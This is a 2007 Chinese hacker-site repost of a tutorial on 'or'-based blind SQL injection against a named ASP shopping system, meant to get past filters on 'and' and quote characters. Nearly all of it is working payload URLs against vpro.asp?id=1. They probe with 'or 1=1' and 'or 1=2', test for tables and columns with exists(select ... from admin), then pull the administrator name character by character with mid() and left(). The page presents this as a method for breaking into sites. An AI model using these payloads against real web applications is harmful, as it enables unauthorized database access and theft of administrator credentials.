 |
  |
|
| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | | ||||
 |
|
|||||||
|
||||||||
|
|||||
| 假是真时真是假——or注入教程 | |||||
作者:佚名 文章来源:网络 点击数: 更新时间:2007-9-16  |
|||||
|
信息来源:邪恶八进制信息安全团队(www.eviloctal.com) 注意:文章首发脚本安全小组论坛(www.Cnsst.Org),后由原创作者友情提交到邪恶八进制信息安全团队,转载请注明首发站点。 PS:很久的文章了,07年4月的,最近找到修改了下就发上来,文章有些乱,请大家不要见怪 记得一年前火狐有一位朋友问,如果一个站过滤了and和“'”的话,改怎么注入啊?当时我随口说了句“or注入”,后来又一次看贴的时候,看到他问我该怎么利用呢?我就写了几个简单的语句给他,叫他自己变换,他很感激我,还说网上没有这种方法。我到网上查了查,还真没有or注入专题呢(or 1=1除外),呵呵,所以,一年后的今天,就有了这篇文章。 我们用雷霆购物系统做or注入演示。我们先用or 1=1和or 1=2来测试是否存在注入点,我们先来看正常页面的面貌。我们现在用or 1=1测试是否存在注入漏洞。返回的是另外一个页面,我们再来测试or 1=2。返回的是正常的页面,说明猜测正确的时候是错误,猜测错误的时候是正常,这就是真正的“假是真时真是假”,比lake2大哥哥的IP欺骗更经典哦,呵呵。 我们来构造测试语句: Copy codevpro.asp?id=1 or exists(select * from admin)返回错误页面,说明存在admin表我们来换一个表试试! Copy codevpro.asp?id=1 or exists(select * from n0h4ck)说明不存在n0h4ck这个表。 我们继续来,构造语句 Copy codevpro.asp?id=1 or exists(select admin from admin)返回or 1=1的页面,说明admin表存在admin字段。 Copy codevpro.asp?id=1 or exists(select padd from admin)返回or 1=2的页面,说明admin表不存在padd字段。 我们现在开始猜测数据了, Copy codevpro.asp?id=1 or (select mid(admin,1,1) from admin)='n'返回or 1=2的页面,说明admin表admin字段的第一个数据的第一个字符不是“n”。 我们再来 Copy codevpro.asp?id=1 or (select mid(admin,1,1) from admin)='a'返回or 1=1的页面,说明说明admin表admin字段的第一个数据的第一个字符是“a”,我们第一个会想到什么呢?当然是“admin”啦。 我们用left函数确定一下, Copy codevpro.asp?id=1 or (select left(admin,5) from admin)='admin'猜测正确,的确是admin,好了,后面的话就不用我说了吧! |
|||||
| 文章录入:IceRiver 责任编辑:admin | |||||
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
| 最新热点 | 最新推荐 | 相关文章 | ||
| 没有相关文章 |
 网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!) |
 |
|
| 关于我们 - 版权声明 - 帮助(?) - 广告服务 - 联系我们 - 友情链接 - 用户注册 - | Powered by ICE RIVER - STUDIO |
|
|
| » CnXHacker.CoM |  |
© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved. |
